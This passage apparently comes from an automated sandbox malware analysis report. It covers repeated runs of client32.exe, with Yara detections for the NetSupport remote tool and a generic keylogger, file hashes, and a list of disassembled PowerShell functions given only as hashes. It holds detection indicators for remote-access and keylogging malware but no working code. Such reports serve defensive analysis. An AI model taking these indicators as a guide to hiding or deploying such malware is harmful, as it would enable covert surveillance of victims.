                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:09:20:00
                                                                            Start date:17/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3402960435.0000000003482000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3402065751.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.2231581976.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 26%, ReversingLabs
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:6
                                                                            Start time:09:20:10
                                                                            Start date:17/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2327778463.0000000001168000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2324165734.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2328346268.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2327730095.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2328304043.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2328304043.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:09:20:18
                                                                            Start date:17/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                                                            Imagebase:0xf70000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2406887302.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2406887302.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2406926738.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.2405095059.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2406580493.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 00007FF848F07070 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: e2cf799f60fafa9efceb638c011d886f26ecacb6991bcb4c065b196e62cac68e
                                                                              • Instruction ID: 5726b004f72edef4630ce942ac79bd8516adc3fd2f63032c0af571a1f8359023
                                                                              • Opcode Fuzzy Hash: e2cf799f60fafa9efceb638c011d886f26ecacb6991bcb4c065b196e62cac68e
                                                                              • Instruction Fuzzy Hash: 9E913930A0CA594FD765EB2CA8056B67BD1EF9A351F1401FBE04DC72D3DB199C828395
                                                                              Function 00007FF848F06000 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: I
                                                                              • API String ID: 0-3707901625
                                                                              • Opcode ID: 4f9e31cfb1137ab274625e843c6c7945d774625968b918ee86d5bddca2927970
                                                                              • Instruction ID: 6a59fa0e73ac22c817ea504399047cbef732065994ef9f315646f1888b4f21a9
                                                                              • Opcode Fuzzy Hash: 4f9e31cfb1137ab274625e843c6c7945d774625968b918ee86d5bddca2927970
                                                                              • Instruction Fuzzy Hash: AB41A231E0C94E8FEB94EB2894557BA77E1EF99390F400179E40ED32C2EF2968814795
                                                                              Function 00007FF848F067A0 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: [.
                                                                              • API String ID: 0-1638407628
                                                                              • Opcode ID: aa21c2e4eb9f6c4e6d371303152d6147e6354567659f8bad85f8aa0ffb759db6
                                                                              • Instruction ID: cfdf13eca74e7e0f7ac94edfd8f8809be9bf66b156912f477549247f6b7af116
                                                                              • Opcode Fuzzy Hash: aa21c2e4eb9f6c4e6d371303152d6147e6354567659f8bad85f8aa0ffb759db6
                                                                              • Instruction Fuzzy Hash: FB415D30E0C90A4FEA94F7689055AB677E2EF5A391F140579D04EC72D6FE2DEC818744
                                                                              Function 00007FF848F06260 Relevance: .6, Instructions: 614COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 82511a42390ed4075e1cf68a02307526ec204490e4cf0e110308147bb146fdb3
                                                                              • Instruction ID: 3cb7b037fbcdd4903727fbd80aecd7e58718fbd3fa0e9db3b18fcb848f3b2b2b
                                                                              • Opcode Fuzzy Hash: 82511a42390ed4075e1cf68a02307526ec204490e4cf0e110308147bb146fdb3
                                                                              • Instruction Fuzzy Hash: D9220634608A4D8FDB98EF1CC898AA977E1FF69301F1501A9E85ED72A5DB35EC41CB40
                                                                              Function 00007FF848FD491E Relevance: .5, Instructions: 524COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324117515.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbba63b21b7760a81b64b4c118334e9122e57dd708c07340dc28e45c82abcbf8
                                                                              • Instruction ID: 498a609ee97699fbf6b88de6fcb0304ecd2d5fdb0b362b824865e3cd9fe6847f
                                                                              • Opcode Fuzzy Hash: fbba63b21b7760a81b64b4c118334e9122e57dd708c07340dc28e45c82abcbf8
                                                                              • Instruction Fuzzy Hash: 60E12531D0EB864FE796AB2858152B47BE1EF66690F0801FFC14AC71D3DE189C468B5A
                                                                              Function 00007FF848FD356D Relevance: .4, Instructions: 410COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324117515.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ce71a92d5bc841260dca0740a1b6f0b8711888a50896cd4a685b58f608e6d6c2
                                                                              • Instruction ID: 136fa95f0714732b1e828790da94ab13f4a43f72fbf0acd53d0ec34ad13bc84d
                                                                              • Opcode Fuzzy Hash: ce71a92d5bc841260dca0740a1b6f0b8711888a50896cd4a685b58f608e6d6c2
                                                                              • Instruction Fuzzy Hash: 62C13671D1EA8A4FE795EB2C98586B97BE0EF55254F0401BAD20EC71D2FB1CAC018B45
                                                                              Function 00007FF848F0AC0D Relevance: .3, Instructions: 266COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8b6ad4b458001579e5689c37b0e72e0b93be72abb1debd659370c6cb97b7029a
                                                                              • Instruction ID: 9bde2565bffaad8d7232bd7414f57165e4596f7cfff28454d8c3e80fb29b7480
                                                                              • Opcode Fuzzy Hash: 8b6ad4b458001579e5689c37b0e72e0b93be72abb1debd659370c6cb97b7029a
                                                                              • Instruction Fuzzy Hash: A621D631D0EAD54FE7A6A73C58251A87FE1EF07650F1944FBC088CB1D7EA489C898356
                                                                              Function 00007FF848F06D6D Relevance: .2, Instructions: 250COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0a9eff0ad9ef26d89782cbce0f80248389b84969ce0351772824b4e36fcfd444
                                                                              • Instruction ID: 9fa57a1cc43204ce80b1d940b96172450c6eb63c5aae4cecb7b897b5b5dbf1da
                                                                              • Opcode Fuzzy Hash: 0a9eff0ad9ef26d89782cbce0f80248389b84969ce0351772824b4e36fcfd444
                                                                              • Instruction Fuzzy Hash: C4718231E18E1A9FEB94F76884156BE63E2EF99791F404275D01ED32D6EF2CAC428344
                                                                              Function 00007FF848FD080E Relevance: .2, Instructions: 224COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324117515.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d5145ebab6cc0bee4f862530c51bd2e780afd87af65ce1384699a1a901524393
                                                                              • Instruction ID: 0472251464ec52cf3343050d1d5253735fdfa3ac127d7665f92b0a9617afc910
                                                                              • Opcode Fuzzy Hash: d5145ebab6cc0bee4f862530c51bd2e780afd87af65ce1384699a1a901524393
                                                                              • Instruction Fuzzy Hash: 2E610832E1EE964FF799B72C245527966E1EFC5690F5800BEC90EC31D3EE1C9804878A
                                                                              Function 00007FF848F0793C Relevance: .2, Instructions: 222COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 97082801b0d9a76e9b6601fd7158c2c863ceb4851dee3c65ce9fada1cd75950d
                                                                              • Instruction ID: 15fbfa93148739f1a8bfd708e0822062289a850ba8f18e0b11bfc432ec02e9ab
                                                                              • Opcode Fuzzy Hash: 97082801b0d9a76e9b6601fd7158c2c863ceb4851dee3c65ce9fada1cd75950d
                                                                              • Instruction Fuzzy Hash: 2061D431F1DD0A4EEBA4BB7854253B9A2D2EF99790F4541B9D04EC32C6EF2DA8028355
                                                                              Function 00007FF848FD49EF Relevance: .2, Instructions: 219COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324117515.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0777cc892efa09e9cc5498a2b64550095e13623f69722279384002d02f1f6e54
                                                                              • Instruction ID: 61a2285887ae84a58ca8665eb63c5840fab65c963e730c9218113bdaef456bfa
                                                                              • Opcode Fuzzy Hash: 0777cc892efa09e9cc5498a2b64550095e13623f69722279384002d02f1f6e54
                                                                              • Instruction Fuzzy Hash: D3611232E1EA864FE798AB28145523876D1EF75781F0800BEC50EC71D3DE2CAC454B5E
                                                                              Function 00007FF848F07315 Relevance: .2, Instructions: 204COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cad918e67713a05729fc28ba2d4b7fce8b2663663435a9981d0542a0eec04163
                                                                              • Instruction ID: 1139ce5790a32ea892b77955ed591208b2d726bca168e2dc209658430130d129
                                                                              • Opcode Fuzzy Hash: cad918e67713a05729fc28ba2d4b7fce8b2663663435a9981d0542a0eec04163
                                                                              • Instruction Fuzzy Hash: 1F51D53060DE498FE7A4EF6CD854A657BE1FF49351B0540FAD489CB2A2EB25EC81C781
                                                                              Function 00007FF848F067E8 Relevance: .2, Instructions: 201COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e0c9c4c2ddb39e1ce00525b5346547636f2bcb03270642e5d8de4122b9dadfd
                                                                              • Instruction ID: bfb32b7cc5141dbc74043f73774088ad758d8a2651c00f75fef65e936d4ce672
                                                                              • Opcode Fuzzy Hash: 7e0c9c4c2ddb39e1ce00525b5346547636f2bcb03270642e5d8de4122b9dadfd
                                                                              • Instruction Fuzzy Hash: FA513631E0DA450FE799B73C58592B97BD2EF5A290F0800BBD44EC71E3EE19AC868345
                                                                              Function 00007FF848F0860D Relevance: .2, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eeed5ea22ec7f41e2ceaa41ce36dceb18e7fca0568f139a93d0792ca471a42b1
                                                                              • Instruction ID: ba1eacb812934954d21911c3f3756d792ddc7b51890148fba5fc7cb7f0471928
                                                                              • Opcode Fuzzy Hash: eeed5ea22ec7f41e2ceaa41ce36dceb18e7fca0568f139a93d0792ca471a42b1
                                                                              • Instruction Fuzzy Hash: 4F412A31A1DA884FE799E73888597B53BE1EF56240F4900FAD449C72D3EF18AC468391
                                                                              Function 00007FF848F0A710 Relevance: .2, Instructions: 175COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                              • Instruction ID: e50010c3c567f45fa3acbde37e6ccfd66e456186e9ddf28cd4043aeb981b7292
                                                                              • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                              • Instruction Fuzzy Hash: C541E73131981C8FDAD4EB1CE898E6877E1FF6C31271505E6E44ACB272EA26DC81CB40
                                                                              Function 00007FF848FD085A Relevance: .1, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324117515.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e82e3955fccdd80d47aceed0583ee237c97048d51daf5e595004e7a6ae5817a5
                                                                              • Instruction ID: abdcd8c4ab6b8b433cf6196849cb3e58bf5cef92150ec5a0a23d4aaa8ad2ccfd
                                                                              • Opcode Fuzzy Hash: e82e3955fccdd80d47aceed0583ee237c97048d51daf5e595004e7a6ae5817a5
                                                                              • Instruction Fuzzy Hash: 5B41D432E1EE974FF399B728246527966D1EFD5691F5800B9CA0EC32D3EE1C9804474A
                                                                              Function 00007FF848F0795B Relevance: .1, Instructions: 140COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2d29cf0a5e41be4487ebdfe7d899e5a9500df5bbd8721d63e3e6098c5b9a6ce5
                                                                              • Instruction ID: 7439a5497d06a4c7a878ddf893df687f9342f610ed7a53c43ec3a4257315ae14
                                                                              • Opcode Fuzzy Hash: 2d29cf0a5e41be4487ebdfe7d899e5a9500df5bbd8721d63e3e6098c5b9a6ce5
                                                                              • Instruction Fuzzy Hash: 2241D431F1DD0A4EEB98B76858613B862D2EF9A794F1540BDD44EC32D7EF2EA8418205
                                                                              Function 00007FF848F07949 Relevance: .1, Instructions: 136COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 396f2d236db7fa5d93f63d2f81b20fe2dcaa7929391a805ecf32203f939994bf
                                                                              • Instruction ID: f73a405b3eaf5797007b6ee63073940eb4bf91d4ab8a4a32ee5660b61dd36d8f
                                                                              • Opcode Fuzzy Hash: 396f2d236db7fa5d93f63d2f81b20fe2dcaa7929391a805ecf32203f939994bf
                                                                              • Instruction Fuzzy Hash: BB41D831F1DD0A4EFB58B76858213B862D2EF9A794F5540F9D44EC32D7EF2EA8418205
                                                                              Function 00007FF848FD369C Relevance: .1, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2324117515.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fa714a618fc7152e7e227d5d6a07d5be296c5cf9a290abdad36e07c1abd39235
                                                                              • Instruction ID: 665385e184abcd0655826bf3c787e7dcb79eb578bfe5c61433ff107cc2ba3ecb
                                                                              • Opcode Fuzzy Hash: fa714a618fc7152e7e227d5d6a07d5be296c5cf9a290abdad36e07c1abd39235
                                                                              • Instruction Fuzzy Hash: FD41D271D1EE8B8FF398AB2C98556B9A6D0EF05294F4401BAD60ED71D2FF1CAC408B45
                                                                              Function 00007FF848F0A189 Relevance: .1, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 01249907caa7f0ebd1f93948978d4ce00d12c796eb2ee1a9229b157d38c713b9
                                                                              • Instruction ID: 5cbd2e4efae520c829275bfd62c9bd61fa6da0d3cb37abc21e246e78ed462a47
                                                                              • Opcode Fuzzy Hash: 01249907caa7f0ebd1f93948978d4ce00d12c796eb2ee1a9229b157d38c713b9
                                                                              • Instruction Fuzzy Hash: 6E31E431A0C68E4FEB94EB2894153F977E1FF9A390F04017AE40DD32D2EF2968858791
                                                                              Function 00007FF848F06728 Relevance: .1, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 412e6b822343cb8c0760a48fcf47e95929a9960350df182cc4056379825a1054
                                                                              • Instruction ID: 73fed892ffb3dd753b860db06add8ed661260799100d96084eb05603ca9fd96d
                                                                              • Opcode Fuzzy Hash: 412e6b822343cb8c0760a48fcf47e95929a9960350df182cc4056379825a1054
                                                                              • Instruction Fuzzy Hash: E531A030A0C9494FEB99EB3DD454B6577E1EF9A340F5400B9D00ECB2D2EA28AC82C744
                                                                              Function 00007FF848F09631 Relevance: .1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 901bf43e26ab69c7afaf57ce44af0c255722984adbeed7deef0ace69b0689a70
                                                                              • Instruction ID: b77f724739a2236aeac3c70f9174443268df63741edceaa2ae13b3c93ea014d4
                                                                              • Opcode Fuzzy Hash: 901bf43e26ab69c7afaf57ce44af0c255722984adbeed7deef0ace69b0689a70
                                                                              • Instruction Fuzzy Hash: 96219030628E488FC798EB2CC49496573E1FF59311B4505BDD08AC7AA2EB25FC41CB40
                                                                              Function 00007FF848F0A6F1 Relevance: .1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 903cfa33571f6b53b5adc2c89fda4b92e1c4a52b42b0ca049eeb9281836fffa9
                                                                              • Instruction ID: 64732a8f71dc950629f1cd707f8b00b5b507206baab4b095a28853e022d33ca0
                                                                              • Opcode Fuzzy Hash: 903cfa33571f6b53b5adc2c89fda4b92e1c4a52b42b0ca049eeb9281836fffa9
                                                                              • Instruction Fuzzy Hash: 27115E3160D8888FD795EB2CE8589647FE0EF6A35275A05F6E088CB1B3EA15DC80C740
                                                                              Function 00007FF848F063B6 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99cded93168c81070383b894d32ba60fa059e66a1f560b7f4a11680e16228d77
                                                                              • Instruction ID: 9cbe0f88c57d84d5c682bb3126e6ca46a46a09b3cca0a05257f87a1b1dc0a3ae
                                                                              • Opcode Fuzzy Hash: 99cded93168c81070383b894d32ba60fa059e66a1f560b7f4a11680e16228d77
                                                                              • Instruction Fuzzy Hash: 09014476F0CA184FE6586A5C74061B973C1E7CA665F04023FD59FD32D1EE15681302C6
                                                                              Function 00007FF848F063A2 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
